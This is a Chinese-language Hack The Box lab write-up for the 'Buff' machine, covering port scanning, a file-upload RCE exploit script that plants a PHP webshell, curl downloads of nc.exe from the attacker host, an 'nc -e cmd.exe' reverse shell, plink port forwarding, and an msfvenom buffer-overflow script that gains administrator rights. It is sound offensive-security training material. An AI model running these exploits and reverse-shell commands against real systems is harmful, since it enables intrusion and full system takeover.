HTB-[buff]

0x00.简述

0x01.信息收集

开放了8080端口

root@JIYE:~/htb/buff# nmap -sC -sV -sT 10.10.10.198 -oN nmap.CVT
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 02:33 EDT
Nmap scan report for 10.10.10.198
Host is up (0.32s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.65 seconds
root@JIYE:~/htb/buff#

0x02.访问8080

手动爬虫发现使用了Gym Management Software 1.0

0x03.查找exp，存在RCE

利用详情

exp url
1.访问“ /upload.php”页面，因为它不检查经过身份验证的用户会话。
2.将GET请求的’id’参数设置为所上传的PHP文件所需的文件名。
3.通过添加两个扩展绕过扩展白名单，最后一个作为可接受的扩展（PNG）。
4.通过在POST请求中将’file’参数的’Content-Type’修改为’image / png’来绕过文件类型检查，并将’pupload’参数设置为’upload’。
5.在POST请求的“file”参数的主体中，插入恶意的PHP代码：

6.Web应用程序将对文件进行重命名，使其具有从文件名称创建的数组中的第二个扩展项;由’.’字符分开。
7.使用带有telepathy参数的GET请求，与位于’/upload.php?id=kamehameha’的webshell进行通信。

import requests, sys, urllib, re
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def webshell(SERVER_URL, session):
    try:
        WEB_SHELL = SERVER_URL+'upload/kamehameha.php'
        getdir  = {'telepathy': 'echo %CD%'}
        r2 = session.get(WEB_SHELL, params=getdir, verify=False)
        status = r2.status_code
        if status != 200:
            print Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        cwd = re.findall('[CDEF].*', r2.text)
        cwd = cwd[0]+"> "
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        while True:
            thought = raw_input(term)
            command = {'telepathy': thought}
            r2 = requests.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except:
        print("\r\nExiting.")
        sys.exit(-1)

def formatHelp(STRING):
    return Style.BRIGHT+Fore.RED+STRING+Fore.RESET

def header():
    BL   = Style.BRIGHT+Fore.GREEN
    RS   = Style.RESET_ALL
    FR   = Fore.RESET
    SIG  = BL+'            /\\\n'+RS
    SIG += Fore.YELLOW+'/vvvvvvvvvvvv '+BL+'\\'+FR+'--------------------------------------,\n'
    SIG += Fore.YELLOW+'`^^^^^^^^^^^^'+BL+' /'+FR+'============'+Fore.RED+'BOKU'+FR+'====================="\n'
    SIG += BL+'            \/'+RS+'\n'
    return SIG

if __name__ == "__main__":
    print header();
    if len(sys.argv) != 2:
        print formatHelp("(+) Usage:\t python %s <WEBAPP_URL>" % sys.argv[0])
        print formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/gym/'" % sys.argv[0])
        sys.exit(-1)
    SERVER_URL = sys.argv[1]
    UPLOAD_DIR = 'upload.php?id=kamehameha'
    UPLOAD_URL = SERVER_URL + UPLOAD_DIR
    s = requests.Session()
    s.get(SERVER_URL, verify=False)
    PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a'
    png     = {
                'file': 
                  (
                    'kaio-ken.php.png', 
                    PNG_magicBytes+'\n'+'<?php echo shell_exec($_GET["telepathy"]); ?>', 
                    'image/png', 
                    {'Content-Disposition': 'form-data'}
                  ) 
              }
    fdata   = {'pupload': 'upload'}
    r1 = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
    webshell(SERVER_URL, s)

0x04.exploit

root@JIYE:~/htb/buff# python2 gymrce.py http://10.10.10.198:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> 
C:\xampp\htdocs\gym\upload> whoami
�PNG

buff\shaun

C:\xampp\htdocs\gym\upload>

0x05.验证

利用完成就可以使用带有telepathy参数的GET请求，与位于’/upload.php?id=kamehameha’的webshell进行通信。

0x06.反弹shell

上传nc.exe

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl -O http://10.10.17.216/nc.exe

root@JIYE:~# cp /usr/share/windows-binaries/nc.exe ./htb/buff/
root@JIYE:~# cd htb/buff/
root@JIYE:~/htb/buff# ls
gymrce.py  nc.exe  nmap.CVT
root@JIYE:~/htb/buff# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

root@JIYE:~/htb/buff# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.198 - - [01/Sep/2020 03:53:36] "GET /nc.exe HTTP/1.1" 200 -

kali监听

1
2
3

root@JIYE:~/htb/buff# nc -nvlp 6666
listening on [any] 6666 ...

反弹

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=nc -e cmd.exe 10.10.17.216 6666

root@JIYE:~/htb/buff# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.198] 51130
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>
C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun

C:\xampp\htdocs\gym\upload>cd\

找到user.txt

C:\Users\shaun\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Desktop

14/07/2020  13:27    <DIR>          .
14/07/2020  13:27    <DIR>          ..
01/09/2020  07:25                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   8,142,823,424 bytes free

C:\Users\shaun\Desktop>type user.txt
type user.txt
*********************************

0x07.提权

查看当前目录下文件，发现好多"前辈"上传的文件😂

C:\xampp\htdocs\gym\upload>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

01/09/2020  08:55    <DIR>          .
01/09/2020  08:55    <DIR>          ..
01/09/2020  07:52         7,481,344 chisel.exe
01/09/2020  08:33                53 kamehameha.php
21/08/2017  14:40            59,392 nc.exe
01/09/2020  08:54            59,392 ncat.exe
01/09/2020  08:55           311,296 p1ink.exe
21/08/2017  14:40           311,296 plink.exe
01/09/2020  08:39                47 shell.php
               7 File(s)      8,222,820 bytes
               2 Dir(s)   8,263,647,232 bytes free

C:\xampp\htdocs\gym\upload>

上传plink

Plink是Windows命令行SSH客户端，plink是ssh协议的一个实现。

root@JIYE:~# cp /usr/share/windows-binaries/plink.exe ./htb/buff/
root@JIYE:~#root@JIYE:~/htb/buff# ls
flag  gymrce.py  nc.exe  nmap.CVT  plink.exe
root@JIYE:~/htb/buff# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.198 - - [01/Sep/2020 04:35:27] "GET /plink.exe HTTP/1.1" 200 -

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl http://10.10.17.216/plink.exe -o plink_f.exe

C:\xampp\htdocs\gym\upload>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

01/09/2020  09:37    <DIR>          .
01/09/2020  09:37    <DIR>          ..
01/09/2020  07:52         7,481,344 chisel.exe
01/09/2020  09:33                53 kamehameha.php
21/08/2017  14:40            59,392 nc.exe
01/09/2020  08:54            59,392 ncat.exe
01/09/2020  08:55           311,296 p1ink.exe
21/08/2017  14:40           311,296 plink.exe
01/09/2020  09:37           311,296 plink_f.exe
01/09/2020  08:39                47 shell.php
               8 File(s)      8,534,116 bytes
               2 Dir(s)   8,604,606,464 bytes free

C:\xampp\htdocs\gym\upload>

查看系统架构，结果为64位

C:\xampp\htdocs\gym\upload>systeminfo   
systeminfo

Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          shaun
Registered Organization:   
Product ID:                00329-10280-00000-AA218
Original Install Date:     16/06/2020, 15:05:58
System Boot Time:          01/09/2020, 10:57:29
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 19/06/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,240 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,325 MB
Virtual Memory: In Use:    2,474 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.198
                                 [02]: fe80::fc70:a698:752c:f5c3
                                 [03]: dead:beef::9007:7d8e:af8f:9419
                                 [04]: dead:beef::fc70:a698:752c:f5c3
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\xampp\htdocs\gym\upload>

本来想上传个winPEASx64.exe扫描可以用来提权的程序，霸特不能执行。。

PS C:\xampp\htdocs\gym\upload> dir
dir

    Directory: C:\xampp\htdocs\gym\upload

Mode                LastWriteTime         Length Name                               
----                -------------         ------ ----                               
-a----       01/09/2020     14:32             53 kamehameha.php                    
-a----       01/09/2020     11:01          59392 nc.exe                             
-a----       01/09/2020     14:12          38616 nc1.exe                             
-a----       01/09/2020     12:48              0 pe.exe                             
-a----       01/09/2020     11:01         311296 plink.exe                           
-a----       01/09/2020     12:17              5 start
-a----       01/09/2020     12:17              5 status                             
-a----       01/09/2020     14:16            400 winP                               
-a----       01/09/2020     14:19          33057 winP.bat                           
-a----       01/09/2020     14:16            400 winP.exe                           
-a----       01/09/2020     13:16         279987 winPEAS.bat                         
-a----       01/09/2020     13:05          87839 winPEASany.exe                     
-a----       01/09/2020     12:45              0 winPEASexe                         
-a----       01/09/2020     13:10          87839 winPEASx64.exe                     
PS C:\xamp\htdocs\gym\upload>

查看端口暂用情况，可以看到8888被监听

C:\xampp\htdocs\gym\upload>netstat -nao | findstr "8888"
netstat -nao | findstr "8888"
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       5828

C:\xampp\htdocs\gym\upload>

使用plink进行端口转发，霸特失败了，个人猜测是防火墙的原因。

1	C:\xampp\htdocs\gym\upload>plink.exe -v -x -a -T -C -noagent -ssh -pw "root" -R 8888:127.0.0.1:8888 root@10.10.17.216

报错为：无法同意密钥交换算法
Google一下发现需要更新putty，但是更新后还是不好使。。。菜狗一脸茫然！
C:\xampp\htdocs\gym\upload>plink.exe -v -x -a -T -C -noagent -ssh -pw “root” -R 8888:127.0.0.1:8888 root@10.10.17.216
plink.exe -v -x -a -T -C -noagent -ssh -pw “root” -R 8888:127.0.0.1:8888 root@10.10.17.216
Looking up host “10.10.17.216”
Connecting to 10.10.17.216 port 22
Server version: SSH-2.0-OpenSSH_8.3p1 Debian-1
Using SSH protocol version 2
We claim version: SSH-2.0-PuTTY_Release_0.63
Couldn’t agree a key exchange algorithm (available: curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256)
FATAL ERROR: Couldn’t agree a key exchange algorithm (available: curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256)

第二天我又来了，这回成功了！，这回换成了powershell。

PS C:\xampp\htdocs\gym\upload> .\plink.exe -v -x -a -T -C -noagent -ssh -pw "root" -R 8888:127.0.0.1:8888 root@10.10.17.216
.\plink.exe -v -x -a -T -C -noagent -ssh -pw "root" -R 8888:127.0.0.1:8888 root@10.10.17.216
Looking up host "10.10.17.216" for SSH connection
Connecting to 10.10.17.216 port 22
We claim version: SSH-2.0-PuTTY_Release_0.74
Remote version: SSH-2.0-OpenSSH_8.3p1 Debian-1
Using SSH protocol version 2
Doing ECDH key exchange with curve Curve25519 and hash SHA-256 (SHA-NI accelerated)
Server also has ecdsa-sha2-nistp256/ssh-rsa host keys, but we don't know any of them
Host key fingerprint is:
ssh-ed25519 255 83:5a:22:c2:54:d1:3b:98:fa:09:81:52:f2:3b:75:8e
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 83:5a:22:c2:54:d1:3b:98:fa:09:81:52:f2:3b:75:8e
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
Initialised AES-256 SDCTR (AES-NI accelerated) outbound encryption
Initialised HMAC-SHA-256 (SHA-NI accelerated) outbound MAC algorithm
Will enable zlib (RFC1950) compression after user authentication
Initialised AES-256 SDCTR (AES-NI accelerated) inbound encryption
Initialised HMAC-SHA-256 (SHA-NI accelerated) inbound MAC algorithm
Will enable zlib (RFC1950) decompression after user authentication
Using username "root".
Sent password
Initialised delayed zlib (RFC1950) decompression
Initialised delayed zlib (RFC1950) compression
Access granted
Requesting remote port 8888 forward to 127.0.0.1:8888
Opening main session channel
Remote port forwarding from 8888 enabled
Opened main channel
Started a shell/command
Linux JIYE 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ls
arachni
cacert.der
clash
CS4.0
Desktop
Documents
Downloads
get-pip.py
htb
Lluna.ovpn
Lluna.ovpn.bak
Music
Pictures
Public
python_shell
Templates
Videos
vulnhub

下面用Buffer Overflow 来提权URL

使用msfvenom生成shellcode替换原来的

root@JIYE:~/htb/buff# msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.17.216 7078' -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 274 (iteration=0)
x86/shikata_ga_nai chosen with final size 274
Payload size: 274 bytes
Final size of python file: 1456 bytes
payload =  b""
payload += b"\xba\xd7\xda\x14\xc1\xdb\xcd\xd9\x74\x24\xf4\x58"
payload += b"\x31\xc9\xb1\x3e\x31\x50\x15\x83\xc0\x04\x03\x50"
payload += b"\x11\xe2\x22\x26\xfc\x43\xcc\xd7\xfd\x23\x45\x32"
payload += b"\xcc\x63\x31\x36\x7f\x54\x32\x1a\x8c\x1f\x16\x8f"
payload += b"\x07\x6d\xbe\xa0\xa0\xd8\x98\x8f\x31\x70\xd8\x8e"
payload += b"\xb1\x8b\x0c\x71\x8b\x43\x41\x70\xcc\xbe\xab\x20"
payload += b"\x85\xb5\x19\xd5\xa2\x80\xa1\x5e\xf8\x05\xa1\x83"
payload += b"\x49\x27\x80\x15\xc1\x7e\x02\x97\x06\x0b\x0b\x8f"
payload += b"\x4b\x36\xc2\x24\xbf\xcc\xd5\xec\xf1\x2d\x79\xd1"
payload += b"\x3d\xdc\x80\x15\xf9\x3f\xf7\x6f\xf9\xc2\x0f\xb4"
payload += b"\x83\x18\x9a\x2f\x23\xea\x3c\x94\xd5\x3f\xda\x5f"
payload += b"\xd9\xf4\xa9\x38\xfe\x0b\x7e\x33\xfa\x80\x81\x94"
payload += b"\x8a\xd3\xa5\x30\xd6\x80\xc4\x61\xb2\x67\xf9\x72"
payload += b"\x1d\xd7\x5f\xf8\xb0\x0c\xd2\xa3\xde\xd3\x61\xde"
payload += b"\xad\xd4\x79\xe1\x81\xbc\x48\x6a\x4e\xba\x55\xb9"
payload += b"\x2a\x34\x1c\xe0\x1b\xdd\xf8\x70\x1e\x80\xfb\xae"
payload += b"\x5d\xbd\x7f\x5b\x1e\x3a\x9f\x2e\x1b\x06\x18\xc2"
payload += b"\x51\x17\xcc\xe4\xc6\x18\xc5\xa6\xd2\xba\x9d\x49"
payload += b"\x4e\x33\x2d\xd6\xf8\xc7\xa9\x89\x9b\x54\x6d\x31"
payload += b"\x25\xf6\xd1\xc8\xa5\x64\x86\x53\x22\x29\x36\xf7"
payload += b"\x84\xb4\xbe\x92\xf8\x1b\x5b\x7d\x9a\x0e\xc7\x53"
payload += b"\x39\xa9\x62\x8c\xf0\x79\x42\xfd\xc2\x57\xab\xca"
payload += b"\x0c\x9a\xfa\x02\x71\xed\xcc\x5d\x49\x11"
root@JIYE:~/htb/buff#

编辑payload

root@JIYE:~/htb/buff# cat buff.py 
import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload =  b""
payload += b"\xba\xd7\xda\x14\xc1\xdb\xcd\xd9\x74\x24\xf4\x58"
payload += b"\x31\xc9\xb1\x3e\x31\x50\x15\x83\xc0\x04\x03\x50"
payload += b"\x11\xe2\x22\x26\xfc\x43\xcc\xd7\xfd\x23\x45\x32"
payload += b"\xcc\x63\x31\x36\x7f\x54\x32\x1a\x8c\x1f\x16\x8f"
payload += b"\x07\x6d\xbe\xa0\xa0\xd8\x98\x8f\x31\x70\xd8\x8e"
payload += b"\xb1\x8b\x0c\x71\x8b\x43\x41\x70\xcc\xbe\xab\x20"
payload += b"\x85\xb5\x19\xd5\xa2\x80\xa1\x5e\xf8\x05\xa1\x83"
payload += b"\x49\x27\x80\x15\xc1\x7e\x02\x97\x06\x0b\x0b\x8f"
payload += b"\x4b\x36\xc2\x24\xbf\xcc\xd5\xec\xf1\x2d\x79\xd1"
payload += b"\x3d\xdc\x80\x15\xf9\x3f\xf7\x6f\xf9\xc2\x0f\xb4"
payload += b"\x83\x18\x9a\x2f\x23\xea\x3c\x94\xd5\x3f\xda\x5f"
payload += b"\xd9\xf4\xa9\x38\xfe\x0b\x7e\x33\xfa\x80\x81\x94"
payload += b"\x8a\xd3\xa5\x30\xd6\x80\xc4\x61\xb2\x67\xf9\x72"
payload += b"\x1d\xd7\x5f\xf8\xb0\x0c\xd2\xa3\xde\xd3\x61\xde"
payload += b"\xad\xd4\x79\xe1\x81\xbc\x48\x6a\x4e\xba\x55\xb9"
payload += b"\x2a\x34\x1c\xe0\x1b\xdd\xf8\x70\x1e\x80\xfb\xae"
payload += b"\x5d\xbd\x7f\x5b\x1e\x3a\x9f\x2e\x1b\x06\x18\xc2"
payload += b"\x51\x17\xcc\xe4\xc6\x18\xc5\xa6\xd2\xba\x9d\x49"
payload += b"\x4e\x33\x2d\xd6\xf8\xc7\xa9\x89\x9b\x54\x6d\x31"
payload += b"\x25\xf6\xd1\xc8\xa5\x64\x86\x53\x22\x29\x36\xf7"
payload += b"\x84\xb4\xbe\x92\xf8\x1b\x5b\x7d\x9a\x0e\xc7\x53"
payload += b"\x39\xa9\x62\x8c\xf0\x79\x42\xfd\xc2\x57\xab\xca"
payload += b"\x0c\x9a\xfa\x02\x71\xed\xcc\x5d\x49\x11"
overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun 

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,8888))
        s.send(buf)
except Exception as e:
        print(sys.exc_value)
root@JIYE:~/htb/buff#

kali监听端口

1
2
3

root@JIYE:~# nc -nvlp 7078
listening on [any] 7078 ...

执行buff.py利用

1	root@JIYE:~/htb/buff# python3 buff.py

root@JIYE:~# nc -nvlp 7078
listening on [any] 7078 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.198] 50209
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
C:\Windows\system32>whoami
whoami
buff\administrator

提权完成，寻找root.txt

C:\Users\Administrator\Desktop>type root.txt
type root.txt
af0c7f7eef091d9e4b4cd0f0e88268c9

C:\Users\Administrator\Desktop>